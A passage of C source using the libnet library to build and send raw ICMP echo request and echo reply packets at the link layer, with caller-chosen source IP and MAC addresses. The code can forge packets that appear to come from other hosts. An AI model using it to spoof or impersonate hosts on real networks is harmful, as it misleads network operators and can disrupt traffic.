  random2 = libnet_get_prand(LIBNET_PRu16);

  /* set up payload */
  icmp_payload_p = icmp_payload;
  icmp_payload_size = sizeof(icmp_payload) - 1;

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* allocate some memory for the packet */
  icmp_packet_size = LIBNET_IP_H + LIBNET_ETH_H + 
                     LIBNET_ICMP_ECHO_H + icmp_payload_size;
  if(libnet_init_packet(icmp_packet_size, &icmp_packet) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed: %s\n");
  }

  /* build the ethernet header */
  libnet_build_ethernet((u_char *)e_dst, (u_char *)e_src,
                        ETHERTYPE_IP, NULL, 0, icmp_packet);

  /* then the IP header */
  libnet_build_ip(ICMP_ECHO_H + icmp_payload_size,
                  0,             /* ip TOS */
                  random1,       /* ip ID */
                  0,             /* fragmented? */
                  255,           /* ttl */
                  IPPROTO_ICMP,  /* protocol */
                  sip,           /* ip source */
                  dip,           /* ip destination */
                  NULL,          /* pointer to payload */
                  0,             /* payload length */
                  icmp_packet + LIBNET_ETH_H);

  /* now the ICMP header */
  libnet_build_icmp_echo(ICMP_ECHO,              /* type */
                         0,                      /* code */
                         random2,                /* id */
                         0,                      /* seq */
                         icmp_payload_p,         /* pointer to payload */
                         icmp_payload_size,      /* payload size */
                         icmp_packet + LIBNET_ETH_H + LIBNET_IP_H);

  /* do checksums */
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_ICMP,
                        LIBNET_ICMP_ECHO_H + icmp_payload_size) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }

  /* send the packet */
  bytes_sent = libnet_write_link_layer(libnet_iface, libnet_device, icmp_packet,
                                       icmp_packet_size);
  if(bytes_sent < icmp_packet_size){
    libnet_error(LN_ERR_WARNING, "libnet_write_link_layer send incomplete\n");
  } else {
    e_char = (unsigned char *)e_src;
    if(Debug_level > 2)
      printf("sent (from %02x:%02x:%02x:%02x:%02x:%02x)\n",
            e_char[0], e_char[1], e_char[2], e_char[3], e_char[4], e_char[5]);
  }

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }

  /* free packet memory */
  libnet_destroy_packet(&icmp_packet);

}

void
send_icmp_reply(u_int32_t sip, u_int32_t dip, struct ether_addr *e_src)
{
  int                      icmp_packet_size;
  int                      bytes_sent;
  u_char                  *icmp_packet = NULL;
  u_char                  *libnet_device = NULL;
  struct libnet_link_int  *libnet_iface = NULL;
  char                     libnet_errbuf[LIBNET_ERRBUF_SIZE];
  struct sockaddr_in       sin;
  int                      random1, random2;
  u_char                   icmp_payload[] =
             "\x68\x8b\x2f\x3b\xf5\x30\x0e\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
             "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
             "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
             "\x30\x31\x32\x33\x34\x35\x36\x37";
  u_char                  *icmp_payload_p;
  int                      icmp_payload_size;

  /* seed random number generator and get some values for later */
  libnet_seed_prand();
  random1 = libnet_get_prand(LIBNET_PRu16);
  random2 = libnet_get_prand(LIBNET_PRu16);

  /* set up payload */
  icmp_payload_p = icmp_payload;
  icmp_payload_size = sizeof(icmp_payload) - 1;

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* allocate some memory for the packet */
  icmp_packet_size = LIBNET_IP_H + LIBNET_ETH_H + 
                     LIBNET_ICMP_ECHO_H + icmp_payload_size;
  if(libnet_init_packet(icmp_packet_size, &icmp_packet) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed: %s\n");
  }

  /* build the ethernet header */
  libnet_build_ethernet((u_char *)My_MAC_addr, (u_char *)e_src,
                        ETHERTYPE_IP, NULL, 0, icmp_packet);

  /* then the IP header */
  libnet_build_ip(ICMP_ECHO_H + icmp_payload_size,
                  0,             /* ip TOS */
                  random1,       /* ip ID */
                  0,             /* fragmented? */
                  255,           /* ttl */
                  IPPROTO_ICMP,  /* protocol */
                  sip,           /* ip source */
                  dip,           /* ip destination */
                  NULL,          /* pointer to payload */
                  0,             /* payload length */
                  icmp_packet + LIBNET_ETH_H);

  /* now the ICMP header */
  libnet_build_icmp_echo(ICMP_ECHOREPLY,         /* type */
                         0,                      /* code */
                         random2,                /* id */
                         0,                      /* seq */
                         icmp_payload_p,         /* pointer to payload */
                         icmp_payload_size,      /* payload size */
                         icmp_packet + LIBNET_ETH_H + LIBNET_IP_H);

  /* do checksums */
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_ICMP,
                        LIBNET_ICMP_ECHO_H + icmp_payload_size) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }

  /* send the packet */
  bytes_sent = libnet_write_link_layer(libnet_iface, libnet_device, icmp_packet,
                                       icmp_packet_size);
  if(bytes_sent < icmp_packet_size){
    libnet_error(LN_ERR_WARNING, "libnet_write_link_layer send incomplete\n");
  } 

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }

  /* free packet memory */
  libnet_destroy_packet(&icmp_packet);

}


